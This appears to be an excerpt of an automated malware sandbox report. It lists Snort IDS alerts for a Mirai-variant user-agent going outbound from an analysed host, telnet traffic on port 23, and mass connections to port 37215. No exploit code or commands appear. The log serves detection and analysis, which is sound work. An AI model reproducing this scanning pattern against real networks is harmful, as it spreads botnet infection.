    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:53612 -> 88.221.34.18:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56312 -> 95.101.214.35:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:33398 -> 95.100.231.123:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42386 -> 95.100.226.52:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59204 -> 95.68.46.234:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:49862 -> 95.58.114.139:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51832 -> 95.217.161.169:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42310 -> 95.101.41.168:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:48976 -> 95.101.14.37:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39258 -> 95.78.232.113:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:47552 -> 95.86.82.1:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39562 -> 95.58.54.92:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52636 -> 88.221.127.197:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:53670 -> 88.221.4.176:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42472 -> 88.218.138.42:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34420 -> 88.198.144.142:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60588 -> 112.121.179.134:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36432 -> 95.216.6.26:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39662 -> 95.86.112.120:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36206 -> 88.99.168.212:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:44240 -> 88.198.38.79:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:57328 -> 95.101.253.210:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56082 -> 95.100.75.213:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:49146 -> 95.100.100.70:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34884 -> 95.169.26.226:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38118 -> 95.216.175.59:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55242 -> 95.59.106.192:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59956 -> 112.167.244.204:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:45418 -> 112.83.36.62:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:45420 -> 112.83.36.62:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56100 -> 95.101.149.149:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35644 -> 95.174.28.164:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:57652 -> 95.217.183.141:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:54374 -> 95.163.53.162:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55098 -> 95.134.64.163:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55042 -> 95.86.111.177:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:46630 -> 95.84.249.57:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:37194 -> 112.165.98.59:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39634 -> 95.170.66.222:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59490 -> 95.216.154.226:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35044 -> 95.101.88.186:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59690 -> 95.100.205.132:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:45826 -> 95.167.23.17:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39656 -> 95.7.114.103:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52232 -> 88.221.37.31:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59722 -> 95.179.146.203:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:33966 -> 95.244.58.83:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:41208 -> 95.217.237.36:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:47876 -> 95.100.179.114:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52832 -> 95.86.81.60:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38848 -> 95.59.243.129:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51628 -> 95.101.175.213:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42972 -> 95.216.115.168:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36270 -> 95.85.210.224:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43754 -> 95.216.124.146:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:47620 -> 95.57.101.214:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51674 -> 95.101.175.213:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:47714 -> 95.100.245.131:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36494 -> 95.101.203.212:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:32844 -> 95.85.26.17:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39556 -> 95.143.181.98:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39368 -> 95.81.32.41:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34720 -> 95.215.140.7:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:44980 -> 95.100.205.6:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:46230 -> 95.181.231.226:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:46354 -> 95.164.62.167:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:33940 -> 95.79.31.246:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59690 -> 112.186.20.38:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38722 -> 95.43.238.159:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:41012 -> 112.186.69.72:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59798 -> 112.186.20.38:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:58512 -> 95.100.66.166:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:53772 -> 95.211.212.40:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39508 -> 95.100.185.228:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:44636 -> 95.217.7.135:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39406 -> 95.100.191.242:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:50536 -> 95.42.29.201:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36698 -> 95.164.22.10:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51396 -> 95.86.125.199:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38812 -> 95.58.72.215:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:54648 -> 112.25.57.43:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:54646 -> 112.25.57.43:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60010 -> 112.186.20.38:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56418 -> 112.127.183.253:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:46424 -> 112.90.95.73:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:46160 -> 95.101.220.172:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:33254 -> 95.42.211.55:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43078 -> 95.237.209.81:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59996 -> 112.158.120.208:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36532 -> 95.141.251.249:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:48634 -> 88.221.180.119:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52440 -> 112.126.92.47:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:37016 -> 95.169.188.17:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56420 -> 95.101.70.23:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43462 -> 95.216.208.204:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36554 -> 95.240.204.194:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52622 -> 95.170.82.199:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52880 -> 95.217.16.101:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38446 -> 95.83.127.154:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56520 -> 112.74.127.163:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:49512 -> 88.212.252.120:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:57584 -> 95.46.0.156:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59908 -> 88.212.8.12:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:37162 -> 95.100.190.36:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:49860 -> 95.100.149.42:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36028 -> 95.214.235.221:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56622 -> 112.187.12.111:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56688 -> 95.59.137.3:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51742 -> 95.58.194.58:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59198 -> 95.168.78.3:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:50632 -> 95.0.142.188:80
    Source: global trafficTCP traffic: 197.160.52.247 ports 1,2,3,5,2323,7
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43690
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43708
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43710
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43714
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43722
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43726
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43732
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43736
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43740
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43758
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51112
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51244
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51256
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51278
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51232
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51284
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51414
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51418
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51350
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51466
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51418
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51490
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51534
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51484
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51596
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51626
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51650
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51716
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51740
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51748
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51770
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58168
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58204
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58220
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58236
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58240
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58256
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58302
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58312
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58312
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58330
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58384
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.255.59.61:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.155.118.60:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.140.93.193:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.94.36.228:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.240.169.137:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.156.75.239:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.232.233.5:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.244.118.41:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.27.205.153:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.23.216.221:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.117.216.223:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.9.175.108:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.11.210.121:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.190.121.11:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.123.46.241:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.146.53.46:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.245.73.238:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.54.220.233:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.224.124.198:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.247.131.106:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.51.193.179:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.185.2.78:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.39.182.12:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.86.193.36:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.100.199.92:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.242.100.146:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.240.50.107:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.253.178.177:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.163.48.77:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.200.161.248:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.30.150.205:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.145.155.228:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.181.142.56:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.66.175.231:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.40.202.138:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.254.121.67:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.7.115.249:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.17.45.55:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.158.67.122:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.26.165.255:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.44.77.144:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.245.119.108:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.19.29.153:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.120.199.234:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.176.240.216:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.169.171.219:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.125.83.44:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.69.237.149:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.144.171.76:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.88.59.149:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.187.160.223:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.224.181.128:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.197.16.90:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.106.185.121:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.60.34.243:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.221.153.216:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.147.173.127:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.133.105.60:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.70.64.205:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.1.0.200:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.137.42.242:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.125.27.147:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.243.121.22:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.232.205.23:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.141.69.137:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.63.198.56:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.193.247.164:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.78.62.100:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.77.83.165:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.249.105.15:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.160.52.247:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.208.36.74:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.13.250.92:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.28.150.175:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.233.104.45:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.118.214.145:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.254.174.243:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.79.154.158:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.96.236.130:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.103.0.230:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.138.74.172:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.121.79.123:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.156.165.8:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.11.115.20:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.246.105.72:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.165.131.109:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.82.220.88:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.104.203.193:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.94.33.179:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.229.206.77:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.45.123.91:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.9.96.189:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.144.49.208:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.143.32.45:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.157.175.85:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.7.198.171:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.152.64.65:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.25.116.122:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.192.185.58:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.213.112.174:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.52.221.20:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.151.58.188:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.78.83.38:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.72.124.54:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.85.67.133:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.213.107.12:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.227.224.104:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.171.250.132:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.121.73.36:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.74.18.238:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.9.143.103:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.201.205.167:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.180.112.182:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.172.27.62:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.162.3.206:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.42.181.115:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.88.141.186:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.24.172.169:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.222.52.169:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.196.2.222:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.207.75.4:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.211.123.251:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.191.186.188:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.62.202.10:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.208.141.8:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.35.182.44:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.203.120.38:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.171.90.147:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.169.155.195:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.231.238.42:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.195.207.128:37215
